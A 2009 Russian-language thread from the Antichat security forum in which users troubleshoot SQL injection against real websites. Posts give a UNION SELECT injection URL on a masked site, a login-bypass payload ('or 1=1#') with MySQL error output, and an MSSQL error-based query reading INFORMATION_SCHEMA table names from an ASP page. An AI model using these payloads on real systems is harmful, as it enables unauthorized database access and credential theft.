ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
22.02.2009, 23:48
|
|
Познающий
Регистрация: 29.08.2008
Сообщений: 86
Провел на форуме:
789539
Репутация:
53
|
|
а какими способами вообще можно узнать логин и пасс от БД
???
|
|
|
22.02.2009, 23:51
|
|
Познающий
Регистрация: 29.08.2008
Сообщений: 86
Провел на форуме:
789539
Репутация:
53
|
|
А где можно спросить что значат различные ошибки?
например:
Notice: Undefined index: controller in /www/la2tit01/www/htdocs/cake/dispatcher.php on line 168
Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /www/la2tit01/www/htdocs/cake/dispatcher.php:168) in /www/la2tit01/www/htdocs/cake/libs/session.php on line 146
Warning: Cannot modify header information - headers already sent by (output started at /www/la2tit01/www/htdocs/cake/dispatcher.php:168) in /www/la2tit01/www/htdocs/cake/libs/session.php on line 147
|
|
|
|
22.02.2009, 23:54
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964
Репутация:
302
|
|
Сообщение от S[N]EP
а какими способами вообще можно узнать логин и пасс от БД
???
Попробуй начать вот с этого
http://forum.antichat.ru/thread43966.html
|
|
|
|
23.02.2009, 00:07
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
А где можно спросить что значат различные ошибки?
можно на русский перевести, и все =\
Попробуй начать вот с этого
скорее с этого - google.ru
|
|
|
|
23.02.2009, 02:23
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Уххх,пасибо ребятишки.До меня быстрее доходит,когда кто-то нормальным человеческим языком объясняет: )))))))))Лавите плюсеги!))
|
|
|
|
23.02.2009, 10:28
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Код:
http://www.*********.ru/index.php?id=23665+and+1=0+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,00,21,23,23--
Последний раз редактировалось R1dex; 23.02.2009 в 21:58..
|
|
|
|
23.02.2009, 11:46
|
|
Banned
Регистрация: 12.02.2009
Сообщений: 73
Провел на форуме:
175651
Репутация:
171
|
|
jokester я не могу сказать какой точно код, так как не вижу его, но могу рассказать тебе историю:
Есть код, допустим он выглядит следующем образом:
Код:
<?
// Начало скрипта
...
// Скрипт получает переменную из формы, допустим <input name="pass" type="password">
$pass = $_POST['pass'];
// Здесь идет проверка/заменна символов у переменной $pass, допустим определим проверку функцией:
function ReRe($re) {
$re = preg_replace("/'/", "\\", $re);
$re = preg_replace("/\"/", "\\", $re);
$re = preg_replace("/</", "", $re);
$re = preg_replace("/>/", "", $re);
$re = preg_replace("/\//", "", $re);
$re = preg_replace("/:/", "", $re);
$re = preg_replace("/\./", "", $re);
return $re;
}
// Дальше скрипт выполняет запрос к БД, и вот его у меня нету
...
// Конец скрипта
?>
Если смотреть по выдачи ошибки MySQL, то получается следующее:
Код:
SELECT * FROM passwords where (pwd = '$pass' or pwd = '$pass' or pwd = '$pass') and dateend>='1235374244'
Т.е. если в поле вставить допустим ' (апостроф), то скрипт выдает следующую ошибку:
Код:
MySQL Error!
------------------------
The Error returned was:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' or pwd = '\') and dateend>='1235374381'' at line 1
Error Number:
1064
SELECT * FROM passwords where (pwd = '\' or pwd = '\' or pwd = '\') and dateend>='1235374381'
Я в растерянности даже не знаю, что сделать, от безысходности даже пытался апостроф заменить на &apos (теоретически прокатывает) и запрос типа: pass&apos) or 1=1#' принимает радостный вид:
Код:
SELECT * FROM passwords where (pwd = 'pass') or 1=1#\' or pwd = 'pass')' or pwd = 'pass') ') and dateend>='1235374814'
Но глаз режет информация о синтаксической ошибке:
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'pass')' or pwd = 'pass') ') and dateend>='1235374941'' at line 1
Вот такая вот печальная история с трагическим концом.  Как думаете дети, в чем автор допустил ошибку?
|
|
|
|
23.02.2009, 12:05
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874
Репутация:
1020
|
|
Сообщение от it's mу
Как думаете дети, в чем автор допустил ошибку?
Я хоть и не детя но ответ очевиден - в то что не закрыл остальной запрос, например:
pass&apos) or 1=1+--+
|
|
|
|
23.02.2009, 12:17
|
|
Banned
Регистрация: 12.02.2009
Сообщений: 73
Провел на форуме:
175651
Репутация:
171
|
|
Вообще-то символ # обозначает комментарий до конца строки в MySQL, а мой запрос в прошлом посте был вида: pass&apos) or 1=1#'
|
|
|
|
23.02.2009, 13:25
|
|
Новичок
Регистрация: 26.12.2008
Сообщений: 16
Провел на форуме:
196900
Репутация:
16
|
|
У меня при запросе, напр
-1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES)--
вылазит ошибка
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'or'.
/html/leftbar-categories.asp, line 12
замена "+" на пробел или /**/ не помогла |
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для S[N]EP](/avatars/avatar64392.jpg?1131532){kind=avatar}
![Аватар для S[N]EP](/avatars/avatar64392.jpg?1131539){kind=avatar}
Линейный вид
